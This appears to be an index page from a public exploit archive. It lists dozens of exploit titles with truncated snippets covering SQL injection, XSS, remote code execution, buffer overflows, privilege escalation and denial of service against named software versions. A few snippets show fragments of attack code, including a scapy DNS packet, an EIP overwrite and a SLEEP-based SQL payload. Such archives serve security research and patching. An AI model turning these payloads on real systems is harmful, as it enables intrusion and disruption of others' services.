Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Oracle WebLogic wls-wsat Component Deserialization RCE', 'Description' = %q The Oracle WebLogic WLS WSAT Component is vulnerable to a XML...
Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
Dup Scout Enterprise 10.0.18 - 'onlineregistration' Remote Buffer Overflow Requires web service to be enabled. Tested on Windows 10 Pro x64 Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457 Credits: Tulpa and SICKNESS for original exploits Modified:...
BIND - 'TSIG' Denial of Service
!/usr/bin/python coding:utf-8 from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT tsig = DNSRRTSIGrrname="local-ddns", algoname="hmac-sha256", rclass=255, maclen=0, macdata="", timesigned=0, fudge=300, error=16 dnsreq = IPdst='127.0.0.1'/UDPdport=53/DNSrd=1, ad=1,...
myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)
Exploit Title: myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting XSS Exploit Author: RedTeam Pentesting GmbH Vendor Homepage: https://www.myfactory.com/ Version: Enfold input NAME="txtUID" VALU...
PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)
Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting XSS Date: May 3rd 2021 Exploit Author: Tyler Butler Vendor Homepage: http://timeclock.sourceforge.net Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/ Version: 1.04 Tested on...
MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path
Exploit Title: MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path Discovery by: Thalia Nieto Discovery Date: 02/01/21 Vendor Homepage: https://www.minitool.com Software Link: https://www.minitool.com/backup/thanks-download.html?v=sm-free&r=download-center/ Tested Version: 3.2...
Exim 4.87 - 4.91 - Local Privilege Escalation
!/bin/bash raptoreximwiz - "The Return of the WIZard" LPE exploit Copyright c 2019 Marco Ivaldi A flaw was found in Exim versions 4.87 to 4.91 inclusive. Improper validation of recipient address in delivermessage function in /src/deliver.c may lead to remote command execution. CVE-2019-10149 This...
Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)
!/usr/bin/env python3 -- coding: utf-8 -- standard modules from metasploit import module extra modules DEPENDENCIESMISSING = False try: import base64 import itertools import os import requests except ImportError: DEPENDENCIESMISSING = True Metasploit Metadata metadata = 'name': 'Microsoft RDP Web...
Online Documents Sharing Platform 1.0 - 'user' SQL Injection
Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection Date: 21.01.2021 Exploit Author: CANKAT ÇAKMAK Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html Software Link:...
ASX to MP3 Converter 1.82.50 (Windows XP SP3) - '.asx' Local Stack Overflow
''' Exploit Title: ASX to MP3 Converter 1.82.50 Stack Overflow Date: 2 Oct 2015 Exploit Author: exptr Vendor Homepage: http://mini-stream.net Version: 1.82.50 Tested on: Windows XP SP3 ''' import struct filename = "exploit.asx" dummy = "A"0x104 EIP = struct.pack'I', 0x76af3adc FFFF =...
Elementor Website Builder < 3.12.2 - Admin+ SQLi
EXPLOIT Elementor Website Builder Replace URL page. On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test',metakey='key4'where+metaid=SLEEP2; Press "Replace URL" on the Replace URL page. Burp...
RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
Exploit Title: RAD SecFlow-1v SF02902.3.01.26 - Persistent Cross-Site Scripting Date: 2020-08-31 Exploit Author: Jonatan Schor and Uriel Yochpaz Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway Version: SecFlow-1v os-image SF02902.3.01.26 Tested on: RAD SecFlow-1v CVE : N/A A...
Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation
============================================= - Discovered by: Dawid Golunski - http://legalhackers.com - dawid at legalhackers.com - CVE-2016-1240 - Release date: 30.09.2016 - Revision: 1 - Severity: High ============================================= I. VULNERABILITY -------------------------...
PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection
Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit Date: May 4, 2012 Author: rayh4c0x4080sec0x2ecom Exploit Discovered by wofeiwo0x4080sec0x2ecom import socket import sys def cgiexploit: pwncode = """""" postLength = lenpwncode httpraw="""POST...
GitLab 11.4.7 - Remote Code Execution (Authenticated)
Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution No Interaction Required Date: 15th December 2020 Exploit Author: Mohin Paramasivam Shad0wQu35t Software Link: https://about.gitlab.com/ POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ Tested on...
Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections
-+================================================================================+- -+ AlstraSoft AskMe Pro = 2.1 SQL Injection Vulnerabilities +- -+================================================================================+- Discovered By: t0pP8uZz Discovered On: 10 JUNE 2008 Script...
Free School Management Software 1.0 - Remote Code Execution (RCE)
Exploit Title: Free School Management Software 1.0 - Remote Code Execution RCE Exploit Author: fuuzap1 Date: 7-12-2021 Category: Web application Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html Software Link:...
Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)
Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload Authenticated Date: 2020-08-24 Software Link: https://wordpress.org/plugins/autoptimize/ Author : SunCSR Team Version: v2.7.6 Tested on Ubuntu 18.04 / Kali Linux Reference: https://wpvulndb.com/vulnerabilities/10372...
LayerBB < 1.1.4 - Cross-Site Request Forgery
Exploit Title: LayerBB 1.1.3 - Multiple CSRF Date: 4/7/2019 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30 Version: 1.1.3 Tested on: Ubuntu 18.04 CVE: CVE-2019-16531 1. Description: LayerBB is a free open-source forum...
Tailor MS 1.0 - Reflected Cross-Site Scripting
Exploit Title: Tailor MS 1.0 - Reflected Cross-Site Scripting Exploit Author: Bobby Cooke boku & Adeeb Shah @hyd3sec Date: 2020-09-14 CVE ID: CVE-2020-23835 Vendor Homepage: https://www.sourcecodester.com Software Link:...
OpenEMR 5.0.1 - 'controller' Remote Code Execution
Exploit Title: OpenEMR 5.0.1 - 'controller' Remote Code Execution Date: 2020-06-22 Exploit Author: Emre ÖVÜNÇ Vendor Homepage: https://www.open-emr.org/ Software Link: https://www.open-emr.org/wiki/index.php/OpenEMRDownloads Version: v5.0.1 Tested on: Linux Link:...
JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution
JBoss AS Remote Exploit by Kingcope use IO::Socket; use LWP::UserAgent; use URI::Escape; use MIME::Base64; sub usage print "JBoss AS Remote Exploit\nby Kingcope\n\nusage: perl jboss.pl \n"; print "example: perl daytona.pl 192.168.2.10 8080 192.168.2.2 443 lnx\n"; exit; if $ARGV != 4 usage; $host ...
OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting
Exploit Title: OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting Date: 19/02/2021 Exploit Author: Kamil Breński Vendor Homepage: https://www.opentext.com/ Software Link: https://www.opentext.com/products-and-solutions/products/enterprise-content-management/content-management...
Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)
Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection Authenticated Date: 10-27-2020 Vulnerability Discovery: Chris Lyne Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58 Exploit Author: Matthew Aberegg Vendor Homepage:...
NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection
Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection Exploit Author: Berk Dusunur Google Dork: N/A Type: Web App Date: 2020-05-28 Vendor Homepage: https://www.nokia.com Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/ Affected...
Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read
Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read Date: 11 October 2021 Exploit Author: z4nd3r Vendor Homepage: http://www.echatserver.com/ Software Link: http://www.echatserver.com/ Version: 3.1 Tested on: Windows 10 Pro Build 19042, English Description: The web...
SyncBreeze 10.0.28 - 'login' Denial of Service (Poc)
Exploit Title: SyncBreeze 10.0.28 - 'login' Denial of Service Poc Date: 18-Dec-2020 Exploit Author: Ahmed Elkhressy Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7, Windows 10...
TypeSetter 5.1 - CSRF (Change admin e-mail)
Exploit Title: TypeSetter 5.1 - CSRF Change admin e-mail Exploit Author: Alperen Ergel Software Homepage: https://www.typesettercms.com/ Version : 5.1 Tested on: Kali & ubuntu Category: WebApp Description Attacker can change admin e-mail address Vulnerable - Go to the admin page view preferences ...
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution
Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE Google Dork: filetype:action Date: 06/09/2017 Exploit Author: Warflop Vendor Homepage: https://struts.apache.org/ Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip Version: Struts 2.5 – Struts 2.5.12...
orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)
Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection Authenticated Date: 28/11/2021 Exploit Author: Hubert Wojciechowski Contact Author: [email protected] Company: https://redteam.pl Vendor Homepage: https://www.orangescrum.org/ Software Link: https://www.orangescrum.org/ Version: 1.8.0...
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Webmin 1.962 - Package Update Escape Bypass RCE Metasploit', 'Description' = %q This module exploits an arbitrary command execution vulnerability...
aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)
Exploit Title: aaPanel 6.6.6 - Authenticated Privilege Escalation Google Dork: Date: 04.05.2020 Exploit Author: Ünsal Furkan Harani Zemarkhos Vendor Homepage: https://www.aapanel.com/ Software Link: https://github.com/aaPanel/aaPanel Version: 6.6.6 REQUIRED Tested on: Linux ubuntu 4.4.0-131-gener...
Gym Management System 1.0 - Stored Cross Site Scripting
Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting Date: 21/10/2020 Exploit Author: Jyotsna Adhana Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html Software Link:...
Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution RCE Google Dork: intext:"adobe coldfusion 11" Date: 2022-22-02 Exploit Author: Amel BOUZIANE-LEBLOND https://twitter.com/amellb Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html...
Courier Management System 1.0 - 'First Name' Stored XSS
Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS Exploit Author: Zhaiyi Zeo Date: 2020-12-11 Google Dork: N/A Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html Software Link:...
RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 - Denial of Service
Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS Google Dork: N/A Date: 03/04/2024 Exploit Author: ice-wzl, Solstice Cyber Solutions Vendor Homepage: https://mikrotik.com/ Software Link: https://mikrotik.com/download/archive Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10...
Voting System 1.0 - Authentication Bypass (SQLI)
Exploit Title: Voting System 1.0 - Authentication Bypass SQLI Date: 06/05/2021 Exploit Author: secure77 Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html Software Link:...
Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure Date: 20.09.2020 Exploit Author: LiquidWorm Vendor Homepage: https://pro-bravia.sony.net Version: 1.7.8 Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure Vendor: Sony Electronics Inc. Product we...
Online Shopping Alphaware 1.0 - Authentication Bypass
Title: Online Shopping Alphaware 1.0 - Authentication Bypass Exploit Author: Ahmed Abbas Date: 2020-07-28 Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html Software Link:...
FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure
Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure Author: Gjoko 'LiquidWorm' Krstic Date: 2018-10-14 Vendor: FLIR Systems, Inc. Product web page: https://www.flir.com Affected version: Firmware: 1.32.16, 1.17.13 OS: necov1.8-0-g7ffe5b3 Hardware: Flir Systems Neco Board...
Gym Management System 1.0 - 'id' SQL Injection
Exploit Title: Gym Management System 1.0 - 'id' SQL Injection Date: 22/10/2020 Exploit Author: Jyotsna Adhana Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html Software Link:...
FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure
Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure Author: Gjoko 'LiquidWorm' Krstic @zeroscience Date: 2018-10-14 Vendor: FLIR Systems, Inc. Product web page: https://www.flir.com Affected version: Firmware: 1.32.16, 1.17.13, OS: necov1.8-0-g7ffe5b3, Hardware: Flir Systems...
Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)
/ Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html Binary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe Mirror:...
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection
Exploit Title: phpliteadmin phpliteadmin.php1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension .db, .db3, .sqlite, etc. if you do not include it yourself. The database will be created in the directory you specified as the $directory...
TP-Link Archer AX21 - Unauthenticated Command Injection
!/usr/bin/python3 Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection Date: 07/25/2023 Exploit Author: Voyag3r https://github.com/Voyag3r-Security Vendor Homepage: https://www.tp-link.com/us/ Version: TP-Link Archer AX21 AX1800 firmware versions before 1.1.4 Build 20230219...
Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)
Exploit Title: Linux Kernel 5.1.x - 'PTRACETRACEME' pkexec Local Privilege Escalation 2 Date: 11/22/21 Exploit Author: Ujas Dhami Version: 4.19 - 5.2.1 Platform: Linux Tested on: Ubuntu 19.04 kernel 5.0.0-15-generic Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64 Kali Linux kernel...
ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)
Exploit Title: ScadaBR 1.0 - Arbitrary File Upload Authenticated 2 Date: 04/21 Exploit Author: Fellipe Oliveira Vendor Homepage: https://www.scadabr.com.br/ Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux Tested on: Debian9,10Ubuntu16.04 !/usr/bin/python import requests,sys,time if...
WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)
Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting XSS Date: 14/01/2021 Exploit Author: Rahul Ramakant Singh Vendor Homepage: https://ghozylab.com/plugins/ Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/ Version: 1.1.7 Tested on...
Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS Date: 2020-9-3 Exploit Author: Mohammed Alshehri Vendor Homepage: http://rumble.sf.net/ Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble0.51.3135-setup.exe Version: Version 0.51.3135 Tested...
Rukovoditel 2.6.1 - RCE (1)
Exploit Title: Rukovoditel 2.6.1 - RCE Date: 2020-06-11 Exploit Author: coiffeur Write Up: https://therealcoiffeur.github.io/c1010 Vendor Homepage: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Version: v2.6.1 CVE: CVE-2020-11819 set -e function usage echo...